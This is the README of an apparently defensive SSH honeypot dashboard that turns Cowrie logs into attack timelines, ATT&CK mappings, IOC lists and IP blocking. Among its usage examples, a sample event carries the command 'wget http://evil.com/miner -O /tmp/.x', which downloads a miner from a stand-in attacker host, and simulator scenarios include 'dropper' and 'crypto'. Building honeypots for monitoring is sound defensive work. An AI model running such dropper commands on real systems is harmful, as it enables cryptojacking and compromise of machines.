shahulgithub1/honeytrace-ai

GitHub: shahulgithub1/honeytrace-ai

一个集成 AI 分析能力的 SSH 蜜罐威胁监控仪表盘,将 Cowrie 日志转化为可视化攻击行为分析与全球威胁情报展示。

Stars: 0 | Forks: 0

# HoneyTrace AI — SSH 威胁监控器 一个专业的蜜罐分析仪表盘,精确展示黑客发起攻击瞬间的所作所为。 ## 快速开始 ``` unzip honeytrace-ai.zip cd honeytrace-ai node server.js ``` 打开 **http://127.0.0.1:3000** 如果 3000 端口被占用: ``` PORT=3001 node server.js ``` ## 从终端发起攻击 完整攻击模拟: ``` node scripts/attack-simulator.js --scenario full ``` 特定场景: ``` node scripts/attack-simulator.js --scenario bruteforce --country China --ip 121.18.238.12 node scripts/attack-simulator.js --scenario crypto --country Netherlands node scripts/attack-simulator.js --scenario recon --country Germany node scripts/attack-simulator.js --scenario dropper --country Russia ``` 通过 curl 发送单个 Cowrie 事件: ``` curl -X POST http://127.0.0.1:3000/api/import/cowrie \ -H "Content-Type: application/json" \ -d '{"eventid":"cowrie.command.input","src_ip":"1.2.3.4","username":"root","input":"wget http://evil.com/miner -O /tmp/.x"}' ``` ## 功能 | 标签页 | 显示内容 | |---|---| | 概览 | 统计数据、时间轴、顶级攻击者、顶级 MITRE 技术 | | 实时动态 | SOC 风格的实时事件流 | | 世界地图 | 可点击的地图 —— 点击任意国家获取通俗易懂的攻击摘要 | | 告警 | 事件分诊,带有确认按钮及已确认历史记录 | | 攻击者 | 带有可点击卡片的排行榜 —— 配置文件、会话重放、命令分析 | | 杀伤链 | 攻击中观察到的 ATT&CK 阶段 | | MITRE ATT&CK | 柱状图 + 热力图 + 战术矩阵 | | IOC | 提取的 URL、IP、域名、文件路径 | | 已拦截 IP | 拦截/解除拦截攻击者(重启后依然保留) | | 事件 | 原始事件表 | | 导入 | 粘贴 Cowrie JSONL 或使用终端模拟器 | ## 脚本 ``` node server.js # start server node scripts/test.js # run 9 tests node scripts/export-report.js # save Markdown report node scripts/attack-simulator.js # simulate attacks from terminal ``` ## API | 方法 | 路由 | 描述 | |---|---|---| | GET | /api/summary | 仪表盘指标 | | GET | /api/attackers | 所有配置文件 | | GET | /api/attackers/:ip | 单个配置文件 | | GET | /api/attackers/:ip/analysis | AI 分析 | | GET | /api/attackers/:ip/session | 会话重放 | | GET | /api/alerts | 告警分诊 | | GET | /api/iocs | 提取的 IOC | | GET | /api/geo | 地理位置攻击数据 | | GET | /api/killchain | 杀伤链 | | GET | /api/livefeed | 实时事件流 | | GET | /api/blocked | 已拦截的 IP | | GET | /api/report | Markdown 报告 | | GET | /api/export/csv | 下载 CSV | | POST | /api/simulate | 添加演示事件 | | POST | /api/import/cowrie | 导入 JSONL | | POST | /api/reset | 恢复种子数据 | | POST | /api/block/:ip | 拦截 IP | | DELETE | /api/block/:ip | 解除拦截 IP | | PATCH | /api/alerts/:id/ack | 确认告警 |
标签:GNU通用公共许可证, HTTP/HTTPS抓包, MITM代理, Node.js, 威胁情报, 密码管理, 开发者工具, 态势感知, 数据可视化, 网络安全, 自定义脚本, 蜜罐, 证书利用, 隐私保护